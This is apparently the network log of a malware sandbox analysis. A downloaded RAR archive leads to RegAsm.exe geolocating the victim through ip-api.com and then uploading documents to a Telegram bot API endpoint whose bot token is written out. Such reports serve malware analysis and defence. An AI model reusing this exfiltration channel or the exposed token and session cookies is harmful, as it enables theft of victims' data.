                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
                                            sec-ch-ua-platform: "Windows"
                                            Accept: */*
                                            Sec-Fetch-Site: same-origin
                                            Sec-Fetch-Mode: cors
                                            Sec-Fetch-Dest: font
                                            Referer: https://workupload.com/css/4280ebd.css?v=KUUBLA72
                                            Accept-Encoding: gzip, deflate, br
                                            Accept-Language: en-US,en;q=0.9
                                            Cookie: captcha=%7B%22puzzle%22%3A%221715842625.15466645ae4125c0d%22%2C%22range%22%3A10000%2C%22find%22%3A%5B%22a578fc5ece0f9fcfe59a506dcf7ef3b3ab07cbdfe377850958d0a460083935e0%22%2C%22a1f3b42e67ae4a1488d868a596c36d8a289bb2a463db77b73c16eafc046fd626%22%2C%220aafdc4ac97c32cb356e53bcb19893480ac9925982128167520edc9fa432c1fb%22%5D%2C%22data%22%3A%22fnKliVtsvqrXGYZjof4BDRK8%5C%2FEBG7DumVzWMM2jgN5%5C%2FAuXvmwTjI9g%5C%2FRBv%2BN0x8FMvuZTsn7RHp5iODKAl2UezSkmpAsUi3vuLUwBrO5%2BKH2oLV7zQTXCAygudoc9oe8b1QCRE1nV7ITwaq1W7MP5kdRTUKi8wot07Nm0IjKdcJwAHz8BTRntpb0IdBX7Qjn%22%7D; token=dog3cr8m9coprihlvsgptlfoci
                                            Response
                                            HTTP/1.1 200 OK
                                            Date: Thu, 16 May 2024 06:57:06 GMT
                                            Server: Apache
                                            Last-Modified: Sun, 07 Jan 2024 18:35:49 GMT
                                            ETag: "c440-60e5f59ac648c"
                                            Accept-Ranges: bytes
                                            Content-Length: 50240
                                            Keep-Alive: timeout=5, max=100
                                            Connection: Keep-Alive
                                            Content-Type: font/woff2
                                          • flag-de
                                            GET
                                            https://workupload.com/fonts/roboto-v29-vietnamese_latin-ext_latin_greek-ext_greek_cyrillic-ext_cyrillic-700.woff2
                                            chrome.exe
                                            Remote address:
                                            144.76.176.119:443
                                            Request
                                            GET /fonts/roboto-v29-vietnamese_latin-ext_latin_greek-ext_greek_cyrillic-ext_cyrillic-700.woff2 HTTP/1.1
                                            Host: workupload.com
                                            Connection: keep-alive
                                            sec-ch-ua: "Chromium";v="110", "Not A(Brand";v="24", "Google Chrome";v="110"
                                            Origin: https://workupload.com
                                            sec-ch-ua-mobile: ?0
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
                                            sec-ch-ua-platform: "Windows"
                                            Accept: */*
                                            Sec-Fetch-Site: same-origin
                                            Sec-Fetch-Mode: cors
                                            Sec-Fetch-Dest: font
                                            Referer: https://workupload.com/css/4280ebd.css?v=KUUBLA72
                                            Accept-Encoding: gzip, deflate, br
                                            Accept-Language: en-US,en;q=0.9
                                            Cookie: captcha=%7B%22puzzle%22%3A%221715842625.15466645ae4125c0d%22%2C%22range%22%3A10000%2C%22find%22%3A%5B%22a578fc5ece0f9fcfe59a506dcf7ef3b3ab07cbdfe377850958d0a460083935e0%22%2C%22a1f3b42e67ae4a1488d868a596c36d8a289bb2a463db77b73c16eafc046fd626%22%2C%220aafdc4ac97c32cb356e53bcb19893480ac9925982128167520edc9fa432c1fb%22%5D%2C%22data%22%3A%22fnKliVtsvqrXGYZjof4BDRK8%5C%2FEBG7DumVzWMM2jgN5%5C%2FAuXvmwTjI9g%5C%2FRBv%2BN0x8FMvuZTsn7RHp5iODKAl2UezSkmpAsUi3vuLUwBrO5%2BKH2oLV7zQTXCAygudoc9oe8b1QCRE1nV7ITwaq1W7MP5kdRTUKi8wot07Nm0IjKdcJwAHz8BTRntpb0IdBX7Qjn%22%7D; token=dog3cr8m9coprihlvsgptlfoci
                                            Response
                                            HTTP/1.1 200 OK
                                            Date: Thu, 16 May 2024 06:57:06 GMT
                                            Server: Apache
                                            Last-Modified: Sun, 07 Jan 2024 18:35:49 GMT
                                            ETag: "c414-60e5f59ac648c"
                                            Accept-Ranges: bytes
                                            Content-Length: 50196
                                            Keep-Alive: timeout=5, max=100
                                            Connection: Keep-Alive
                                            Content-Type: font/woff2
                                          • flag-de
                                            GET
                                            https://workupload.com/favicon/favicon.ico
                                            chrome.exe
                                            Remote address:
                                            144.76.176.119:443
                                            Request
                                            GET /favicon/favicon.ico HTTP/1.1
                                            Host: workupload.com
                                            Connection: keep-alive
                                            sec-ch-ua: "Chromium";v="110", "Not A(Brand";v="24", "Google Chrome";v="110"
                                            sec-ch-ua-mobile: ?0
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
                                            sec-ch-ua-platform: "Windows"
                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                            Sec-Fetch-Site: same-origin
                                            Sec-Fetch-Mode: no-cors
                                            Sec-Fetch-Dest: image
                                            Referer: https://workupload.com/file/fkp8vSaWfcU
                                            Accept-Encoding: gzip, deflate, br
                                            Accept-Language: en-US,en;q=0.9
                                            Cookie: captcha=%7B%22puzzle%22%3A%221715842625.15466645ae4125c0d%22%2C%22range%22%3A10000%2C%22find%22%3A%5B%22a578fc5ece0f9fcfe59a506dcf7ef3b3ab07cbdfe377850958d0a460083935e0%22%2C%22a1f3b42e67ae4a1488d868a596c36d8a289bb2a463db77b73c16eafc046fd626%22%2C%220aafdc4ac97c32cb356e53bcb19893480ac9925982128167520edc9fa432c1fb%22%5D%2C%22data%22%3A%22fnKliVtsvqrXGYZjof4BDRK8%5C%2FEBG7DumVzWMM2jgN5%5C%2FAuXvmwTjI9g%5C%2FRBv%2BN0x8FMvuZTsn7RHp5iODKAl2UezSkmpAsUi3vuLUwBrO5%2BKH2oLV7zQTXCAygudoc9oe8b1QCRE1nV7ITwaq1W7MP5kdRTUKi8wot07Nm0IjKdcJwAHz8BTRntpb0IdBX7Qjn%22%7D; token=dog3cr8m9coprihlvsgptlfoci
                                            Response
                                            HTTP/1.1 200 OK
                                            Date: Thu, 16 May 2024 06:57:06 GMT
                                            Server: Apache
                                            Last-Modified: Sun, 07 Jan 2024 18:35:49 GMT
                                            ETag: "3aee-60e5f59ac54ec"
                                            Accept-Ranges: bytes
                                            Content-Length: 15086
                                            Keep-Alive: timeout=5, max=99
                                            Connection: Keep-Alive
                                            Content-Type: image/vnd.microsoft.icon
                                          • flag-de
                                            GET
                                            https://workupload.com/start/fkp8vSaWfcU
                                            chrome.exe
                                            Remote address:
                                            144.76.176.119:443
                                            Request
                                            GET /start/fkp8vSaWfcU HTTP/1.1
                                            Host: workupload.com
                                            Connection: keep-alive
                                            sec-ch-ua: "Chromium";v="110", "Not A(Brand";v="24", "Google Chrome";v="110"
                                            sec-ch-ua-mobile: ?0
                                            sec-ch-ua-platform: "Windows"
                                            Upgrade-Insecure-Requests: 1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                            Sec-Fetch-Site: same-origin
                                            Sec-Fetch-Mode: navigate
                                            Sec-Fetch-User: ?1
                                            Sec-Fetch-Dest: document
                                            Referer: https://workupload.com/file/fkp8vSaWfcU
                                            Accept-Encoding: gzip, deflate, br
                                            Accept-Language: en-US,en;q=0.9
                                            Cookie: captcha=%7B%22puzzle%22%3A%221715842625.15466645ae4125c0d%22%2C%22range%22%3A10000%2C%22find%22%3A%5B%22a578fc5ece0f9fcfe59a506dcf7ef3b3ab07cbdfe377850958d0a460083935e0%22%2C%22a1f3b42e67ae4a1488d868a596c36d8a289bb2a463db77b73c16eafc046fd626%22%2C%220aafdc4ac97c32cb356e53bcb19893480ac9925982128167520edc9fa432c1fb%22%5D%2C%22data%22%3A%22fnKliVtsvqrXGYZjof4BDRK8%5C%2FEBG7DumVzWMM2jgN5%5C%2FAuXvmwTjI9g%5C%2FRBv%2BN0x8FMvuZTsn7RHp5iODKAl2UezSkmpAsUi3vuLUwBrO5%2BKH2oLV7zQTXCAygudoc9oe8b1QCRE1nV7ITwaq1W7MP5kdRTUKi8wot07Nm0IjKdcJwAHz8BTRntpb0IdBX7Qjn%22%7D; token=dog3cr8m9coprihlvsgptlfoci
                                            Response
                                            HTTP/1.1 200 OK
                                            Date: Thu, 16 May 2024 06:57:08 GMT
                                            Server: Apache
                                            Cache-Control: max-age=0, private, must-revalidate, no-cache, private
                                            Vary: Accept-Encoding
                                            Content-Encoding: gzip
                                            Content-Length: 2608
                                            Keep-Alive: timeout=5, max=100
                                            Connection: Keep-Alive
                                            Content-Type: text/html; charset=UTF-8
                                          • flag-de
                                            GET
                                            https://workupload.com/qr/file/fkp8vSaWfcU
                                            chrome.exe
                                            Remote address:
                                            144.76.176.119:443
                                            Request
                                            GET /qr/file/fkp8vSaWfcU HTTP/1.1
                                            Host: workupload.com
                                            Connection: keep-alive
                                            sec-ch-ua: "Chromium";v="110", "Not A(Brand";v="24", "Google Chrome";v="110"
                                            sec-ch-ua-mobile: ?0
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
                                            sec-ch-ua-platform: "Windows"
                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                            Sec-Fetch-Site: same-origin
                                            Sec-Fetch-Mode: no-cors
                                            Sec-Fetch-Dest: image
                                            Referer: https://workupload.com/start/fkp8vSaWfcU
                                            Accept-Encoding: gzip, deflate, br
                                            Accept-Language: en-US,en;q=0.9
                                            Cookie: captcha=%7B%22puzzle%22%3A%221715842625.15466645ae4125c0d%22%2C%22range%22%3A10000%2C%22find%22%3A%5B%22a578fc5ece0f9fcfe59a506dcf7ef3b3ab07cbdfe377850958d0a460083935e0%22%2C%22a1f3b42e67ae4a1488d868a596c36d8a289bb2a463db77b73c16eafc046fd626%22%2C%220aafdc4ac97c32cb356e53bcb19893480ac9925982128167520edc9fa432c1fb%22%5D%2C%22data%22%3A%22fnKliVtsvqrXGYZjof4BDRK8%5C%2FEBG7DumVzWMM2jgN5%5C%2FAuXvmwTjI9g%5C%2FRBv%2BN0x8FMvuZTsn7RHp5iODKAl2UezSkmpAsUi3vuLUwBrO5%2BKH2oLV7zQTXCAygudoc9oe8b1QCRE1nV7ITwaq1W7MP5kdRTUKi8wot07Nm0IjKdcJwAHz8BTRntpb0IdBX7Qjn%22%7D; token=dog3cr8m9coprihlvsgptlfoci
                                            Response
                                            HTTP/1.1 200 OK
                                            Date: Thu, 16 May 2024 06:57:08 GMT
                                            Server: Apache
                                            Cache-Control: max-age=0, private, must-revalidate, no-cache, private
                                            Keep-Alive: timeout=5, max=99
                                            Connection: Keep-Alive
                                            Transfer-Encoding: chunked
                                            Content-Type: image/png
                                          • flag-de
                                            GET
                                            https://workupload.com/favicon/manifest.json
                                            chrome.exe
                                            Remote address:
                                            144.76.176.119:443
                                            Request
                                            GET /favicon/manifest.json HTTP/1.1
                                            Host: workupload.com
                                            Connection: keep-alive
                                            sec-ch-ua: "Chromium";v="110", "Not A(Brand";v="24", "Google Chrome";v="110"
                                            sec-ch-ua-mobile: ?0
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
                                            sec-ch-ua-platform: "Windows"
                                            Accept: */*
                                            Sec-Fetch-Site: same-origin
                                            Sec-Fetch-Mode: cors
                                            Sec-Fetch-Dest: manifest
                                            Referer: https://workupload.com/file/fkp8vSaWfcU
                                            Accept-Encoding: gzip, deflate, br
                                            Accept-Language: en-US,en;q=0.9
                                            Response
                                            HTTP/1.1 200 OK
                                            Date: Thu, 16 May 2024 06:57:06 GMT
                                            Server: Apache
                                            Last-Modified: Sun, 07 Jan 2024 18:35:49 GMT
                                            ETag: "145-60e5f59ac54ec-gzip"
                                            Accept-Ranges: bytes
                                            Vary: Accept-Encoding
                                            Content-Encoding: gzip
                                            Content-Length: 186
                                            Keep-Alive: timeout=5, max=100
                                            Connection: Keep-Alive
                                            Content-Type: application/json
                                          • flag-de
                                            GET
                                            https://workupload.com/api/file/getDownloadServer/fkp8vSaWfcU
                                            chrome.exe
                                            Remote address:
                                            144.76.176.119:443
                                            Request
                                            GET /api/file/getDownloadServer/fkp8vSaWfcU HTTP/1.1
                                            Host: workupload.com
                                            Connection: keep-alive
                                            sec-ch-ua: "Chromium";v="110", "Not A(Brand";v="24", "Google Chrome";v="110"
                                            Accept: application/json, text/javascript, */*; q=0.01
                                            X-Requested-With: XMLHttpRequest
                                            sec-ch-ua-mobile: ?0
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
                                            sec-ch-ua-platform: "Windows"
                                            Sec-Fetch-Site: same-origin
                                            Sec-Fetch-Mode: cors
                                            Sec-Fetch-Dest: empty
                                            Referer: https://workupload.com/start/fkp8vSaWfcU
                                            Accept-Encoding: gzip, deflate, br
                                            Accept-Language: en-US,en;q=0.9
                                            Cookie: captcha=%7B%22puzzle%22%3A%221715842625.15466645ae4125c0d%22%2C%22range%22%3A10000%2C%22find%22%3A%5B%22a578fc5ece0f9fcfe59a506dcf7ef3b3ab07cbdfe377850958d0a460083935e0%22%2C%22a1f3b42e67ae4a1488d868a596c36d8a289bb2a463db77b73c16eafc046fd626%22%2C%220aafdc4ac97c32cb356e53bcb19893480ac9925982128167520edc9fa432c1fb%22%5D%2C%22data%22%3A%22fnKliVtsvqrXGYZjof4BDRK8%5C%2FEBG7DumVzWMM2jgN5%5C%2FAuXvmwTjI9g%5C%2FRBv%2BN0x8FMvuZTsn7RHp5iODKAl2UezSkmpAsUi3vuLUwBrO5%2BKH2oLV7zQTXCAygudoc9oe8b1QCRE1nV7ITwaq1W7MP5kdRTUKi8wot07Nm0IjKdcJwAHz8BTRntpb0IdBX7Qjn%22%7D; token=dog3cr8m9coprihlvsgptlfoci
                                            Response
                                            HTTP/1.1 200 OK
                                            Date: Thu, 16 May 2024 06:57:08 GMT
                                            Server: Apache
                                            Cache-Control: max-age=0, private, must-revalidate, no-cache, private
                                            Vary: Accept-Encoding
                                            Content-Encoding: gzip
                                            Content-Length: 101
                                            Keep-Alive: timeout=5, max=100
                                            Connection: Keep-Alive
                                            Content-Type: application/json
                                          • flag-de
                                            GET
                                            https://f81.workupload.com/download/fkp8vSaWfcU
                                            chrome.exe
                                            Remote address:
                                            94.130.130.53:443
                                            Request
                                            GET /download/fkp8vSaWfcU HTTP/1.1
                                            Host: f81.workupload.com
                                            Connection: keep-alive
                                            sec-ch-ua: "Chromium";v="110", "Not A(Brand";v="24", "Google Chrome";v="110"
                                            sec-ch-ua-mobile: ?0
                                            sec-ch-ua-platform: "Windows"
                                            Upgrade-Insecure-Requests: 1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                            Sec-Fetch-Site: same-site
                                            Sec-Fetch-Mode: navigate
                                            Sec-Fetch-Dest: document
                                            Referer: https://workupload.com/
                                            Accept-Encoding: gzip, deflate, br
                                            Accept-Language: en-US,en;q=0.9
                                            Cookie: captcha=%7B%22puzzle%22%3A%221715842625.15466645ae4125c0d%22%2C%22range%22%3A10000%2C%22find%22%3A%5B%22a578fc5ece0f9fcfe59a506dcf7ef3b3ab07cbdfe377850958d0a460083935e0%22%2C%22a1f3b42e67ae4a1488d868a596c36d8a289bb2a463db77b73c16eafc046fd626%22%2C%220aafdc4ac97c32cb356e53bcb19893480ac9925982128167520edc9fa432c1fb%22%5D%2C%22data%22%3A%22fnKliVtsvqrXGYZjof4BDRK8%5C%2FEBG7DumVzWMM2jgN5%5C%2FAuXvmwTjI9g%5C%2FRBv%2BN0x8FMvuZTsn7RHp5iODKAl2UezSkmpAsUi3vuLUwBrO5%2BKH2oLV7zQTXCAygudoc9oe8b1QCRE1nV7ITwaq1W7MP5kdRTUKi8wot07Nm0IjKdcJwAHz8BTRntpb0IdBX7Qjn%22%7D; token=dog3cr8m9coprihlvsgptlfoci
                                            Response
                                            HTTP/1.1 200 OK
                                            Date: Thu, 16 May 2024 06:57:10 GMT
                                            Server: Apache
                                            Access-Control-Allow-Origin: https://workupload.com
                                            Access-Control-Allow-Headers: Range
                                            Access-Control-Expose-Headers: Accept-Ranges, Content-Encoding, Content-Length, Content-Range
                                            Content-Description: File Transfer
                                            Content-Disposition: attachment; filename="alright prynce v2 fr.rar"
                                            Expires: 0
                                            Cache-Control: must-revalidate
                                            Pragma: public
                                            Content-Length: 138877
                                            Keep-Alive: timeout=5, max=100
                                            Connection: Keep-Alive
                                            Content-Type: application/octet-stream
                                          • flag-fr
                                            POST
                                            https://consent.google.com/save?continue=https://www.google.com/search?q%3D7zip%26oq%3D7zip%26aqs%3Dchrome..69i57.3645j0j4%26sourceid%3Dchrome%26ie%3DUTF-8&gl=UK&m=0&pc=srp&x=5&src=2&hl=en&bl=gws_20240513-0_RC3&uxe=none&cm=2&set_eom=false&set_aps=true&set_sc=true
                                            chrome.exe
                                            Remote address:
                                            142.250.179.78:443
                                            Request
                                            POST /save?continue=https://www.google.com/search?q%3D7zip%26oq%3D7zip%26aqs%3Dchrome..69i57.3645j0j4%26sourceid%3Dchrome%26ie%3DUTF-8&gl=UK&m=0&pc=srp&x=5&src=2&hl=en&bl=gws_20240513-0_RC3&uxe=none&cm=2&set_eom=false&set_aps=true&set_sc=true HTTP/2.0
                                            host: consent.google.com
                                            content-length: 0
                                            sec-ch-ua: "Chromium";v="110", "Not A(Brand";v="24", "Google Chrome";v="110"
                                            sec-ch-ua-mobile: ?0
                                            user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
                                            sec-ch-ua-platform: "Windows"
                                            accept: */*
                                            origin: https://www.google.com
                                            x-client-data: CODxygE=
                                            sec-fetch-site: same-site
                                            sec-fetch-mode: cors
                                            sec-fetch-dest: empty
                                            referer: https://www.google.com/
                                            accept-encoding: gzip, deflate, br
                                            accept-language: en-US,en;q=0.9
                                            cookie: AEC=AQTF6HxUxouQBcjizhCE07uA3STH-2UtXdvRD1m6rXndR4WdbXra_jt2v60
                                            cookie: __Secure-ENID=19.SE=R99nsubRQNQbGnF0LIjkD4AXJ9PJSALD9Xb_URHgy_EsEKH9vdjGv3sl0QfJENuHPLSi-Y97rXWS-jKdUhb4mycz34myWXY-BNlx9Aw-l5JSp-4UYB9nEnAgDt7VYIErFJBwTWFB_wKPAzdsUj5yua6G_dFBVHXqbRZaZjOqXgmj6CS7fZA
                                            cookie: SOCS=CAISHAgCEhJnd3NfMjAyNDA1MTMtMF9SQzMaAmVuIAEaBgiAmZWyBg
                                          • flag-fr
                                            GET
                                            https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTEwLjAuNTQ4MS4xMDQSEAlL1An4iaKj4hIFDUqFnlI=?alt=proto
                                            chrome.exe
                                            Remote address:
                                            216.58.215.42:443
                                            Request
                                            GET /v1/pages/ChVDaHJvbWUvMTEwLjAuNTQ4MS4xMDQSEAlL1An4iaKj4hIFDUqFnlI=?alt=proto HTTP/2.0
                                            host: content-autofill.googleapis.com
                                            x-goog-encode-response-if-executable: base64
                                            x-goog-api-key: AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw
                                            x-client-data: CODxygE=
                                            sec-fetch-site: none
                                            sec-fetch-mode: no-cors
                                            sec-fetch-dest: empty
                                            user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
                                            accept-encoding: gzip, deflate, br
                                            accept-language: en-US,en;q=0.9
                                          • flag-de
                                            GET
                                            https://www.7-zip.org/7ziplogo.png
                                            chrome.exe
                                            Remote address:
                                            49.12.202.237:443
                                            Request
                                            GET /7ziplogo.png HTTP/1.1
                                            Host: www.7-zip.org
                                            Connection: keep-alive
                                            sec-ch-ua: "Chromium";v="110", "Not A(Brand";v="24", "Google Chrome";v="110"
                                            sec-ch-ua-mobile: ?0
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
                                            sec-ch-ua-platform: "Windows"
                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                            Sec-Fetch-Site: same-origin
                                            Sec-Fetch-Mode: no-cors
                                            Sec-Fetch-Dest: image
                                            Referer: https://www.7-zip.org/
                                            Accept-Encoding: gzip, deflate, br
                                            Accept-Language: en-US,en;q=0.9
                                            Response
                                            HTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Thu, 16 May 2024 06:57:22 GMT
                                            Content-Type: image/png
                                            Content-Length: 1417
                                            Last-Modified: Tue, 27 Sep 2022 13:14:27 GMT
                                            Connection: keep-alive
                                            ETag: "6332f733-589"
                                            Accept-Ranges: bytes
                                          • flag-de
                                            GET
                                            https://www.7-zip.org/
                                            chrome.exe
                                            Remote address:
                                            49.12.202.237:443
                                            Request
                                            GET / HTTP/1.1
                                            Host: www.7-zip.org
                                            Connection: keep-alive
                                            sec-ch-ua: "Chromium";v="110", "Not A(Brand";v="24", "Google Chrome";v="110"
                                            sec-ch-ua-mobile: ?0
                                            sec-ch-ua-platform: "Windows"
                                            Upgrade-Insecure-Requests: 1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                            Sec-Fetch-Site: cross-site
                                            Sec-Fetch-Mode: navigate
                                            Sec-Fetch-User: ?1
                                            Sec-Fetch-Dest: document
                                            Referer: https://www.google.com/
                                            Accept-Encoding: gzip, deflate, br
                                            Accept-Language: en-US,en;q=0.9
                                            Response
                                            HTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Thu, 16 May 2024 06:57:22 GMT
                                            Content-Type: text/html
                                            Last-Modified: Wed, 15 May 2024 12:45:38 GMT
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            ETag: W/"6644ae72-1c2c"
                                            Content-Encoding: gzip
                                          • flag-de
                                            GET
                                            https://www.7-zip.org/style.css
                                            chrome.exe
                                            Remote address:
                                            49.12.202.237:443
                                            Request
                                            GET /style.css HTTP/1.1
                                            Host: www.7-zip.org
                                            Connection: keep-alive
                                            sec-ch-ua: "Chromium";v="110", "Not A(Brand";v="24", "Google Chrome";v="110"
                                            sec-ch-ua-mobile: ?0
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
                                            sec-ch-ua-platform: "Windows"
                                            Accept: text/css,*/*;q=0.1
                                            Sec-Fetch-Site: same-origin
                                            Sec-Fetch-Mode: no-cors
                                            Sec-Fetch-Dest: style
                                            Referer: https://www.7-zip.org/
                                            Accept-Encoding: gzip, deflate, br
                                            Accept-Language: en-US,en;q=0.9
                                            Response
                                            HTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Thu, 16 May 2024 06:57:22 GMT
                                            Content-Type: text/css
                                            Content-Length: 1005
                                            Last-Modified: Wed, 08 May 2024 09:31:33 GMT
                                            Connection: keep-alive
                                            ETag: "663b4675-3ed"
                                            Accept-Ranges: bytes
                                          • flag-de
                                            GET
                                            https://www.7-zip.org/favicon.ico
                                            chrome.exe
                                            Remote address:
                                            49.12.202.237:443
                                            Request
                                            GET /favicon.ico HTTP/1.1
                                            Host: www.7-zip.org
                                            Connection: keep-alive
                                            sec-ch-ua: "Chromium";v="110", "Not A(Brand";v="24", "Google Chrome";v="110"
                                            sec-ch-ua-mobile: ?0
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
                                            sec-ch-ua-platform: "Windows"
                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                            Sec-Fetch-Site: same-origin
                                            Sec-Fetch-Mode: no-cors
                                            Sec-Fetch-Dest: image
                                            Referer: https://www.7-zip.org/
                                            Accept-Encoding: gzip, deflate, br
                                            Accept-Language: en-US,en;q=0.9
                                            Response
                                            HTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Thu, 16 May 2024 06:57:22 GMT
                                            Content-Type: image/x-icon
                                            Content-Length: 318
                                            Last-Modified: Tue, 27 Sep 2022 13:14:27 GMT
                                            Connection: keep-alive
                                            ETag: "6332f733-13e"
                                            Accept-Ranges: bytes
                                          • flag-de
                                            GET
                                            https://www.7-zip.org/a/7z2405-x64.exe
                                            chrome.exe
                                            Remote address:
                                            49.12.202.237:443
                                            Request
                                            GET /a/7z2405-x64.exe HTTP/1.1
                                            Host: www.7-zip.org
                                            Connection: keep-alive
                                            sec-ch-ua: "Chromium";v="110", "Not A(Brand";v="24", "Google Chrome";v="110"
                                            sec-ch-ua-mobile: ?0
                                            sec-ch-ua-platform: "Windows"
                                            Upgrade-Insecure-Requests: 1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                            Sec-Fetch-Site: same-origin
                                            Sec-Fetch-Mode: navigate
                                            Sec-Fetch-User: ?1
                                            Sec-Fetch-Dest: document
                                            Referer: https://www.7-zip.org/
                                            Accept-Encoding: gzip, deflate, br
                                            Accept-Language: en-US,en;q=0.9
                                            Response
                                            HTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Thu, 16 May 2024 06:57:24 GMT
                                            Content-Type: application/octet-stream
                                            Content-Length: 1619461
                                            Last-Modified: Wed, 15 May 2024 10:31:38 GMT
                                            Connection: keep-alive
                                            ETag: "66448f0a-18b605"
                                            Accept-Ranges: bytes
                                          • flag-us
                                            GET
                                            http://ip-api.com/json/?fields=11827
                                            RegAsm.exe
                                            Remote address:
                                            208.95.112.1:80
                                            Request
                                            GET /json/?fields=11827 HTTP/1.1
                                            Host: ip-api.com
                                            Connection: Keep-Alive
                                            Response
                                            HTTP/1.1 200 OK
                                            Date: Thu, 16 May 2024 06:58:33 GMT
                                            Content-Type: application/json; charset=utf-8
                                            Content-Length: 183
                                            Access-Control-Allow-Origin: *
                                            X-Ttl: 5
                                            X-Rl: 40
                                          • flag-us
                                            GET
                                            http://ip-api.com/json/?fields=11827
                                            RegAsm.exe
                                            Remote address:
                                            208.95.112.1:80
                                            Request
                                            GET /json/?fields=11827 HTTP/1.1
                                            Host: ip-api.com
                                            Connection: Keep-Alive
                                            Response
                                            HTTP/1.1 200 OK
                                            Date: Thu, 16 May 2024 06:58:35 GMT
                                            Content-Type: application/json; charset=utf-8
                                            Content-Length: 183
                                            Access-Control-Allow-Origin: *
                                            X-Ttl: 3
                                            X-Rl: 39
                                          • flag-us
                                            GET
                                            http://ip-api.com/json/?fields=11827
                                            RegAsm.exe
                                            Remote address:
                                            208.95.112.1:80
                                            Request
                                            GET /json/?fields=11827 HTTP/1.1
                                            Host: ip-api.com
                                            Connection: Keep-Alive
                                            Response
                                            HTTP/1.1 200 OK
                                            Date: Thu, 16 May 2024 06:58:38 GMT
                                            Content-Type: application/json; charset=utf-8
                                            Content-Length: 183
                                            Access-Control-Allow-Origin: *
                                            X-Ttl: 0
                                            X-Rl: 38
                                          • flag-nl
                                            POST
                                            https://api.telegram.org/bot6719312271:AAE1QFaFTcG0HSHiQXVv7gdDUMwSNOPMadg/sendDocument
                                            RegAsm.exe
                                            Remote address:
                                            149.154.167.220:443
                                            Request
                                            POST /bot6719312271:AAE1QFaFTcG0HSHiQXVv7gdDUMwSNOPMadg/sendDocument HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=----------------------------8dc75759e709b69
                                            Host: api.telegram.org
                                            Content-Length: 428977
                                            Expect: 100-continue
                                            Connection: Keep-Alive
                                            Response
                                            HTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Thu, 16 May 2024 06:58:43 GMT
                                            Content-Type: application/json
                                            Content-Length: 919
                                            Connection: keep-alive
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                          • flag-nl
                                            POST
                                            https://api.telegram.org/bot6719312271:AAE1QFaFTcG0HSHiQXVv7gdDUMwSNOPMadg/sendDocument
                                            RegAsm.exe
                                            Remote address:
                                            149.154.167.220:443
                                            Request
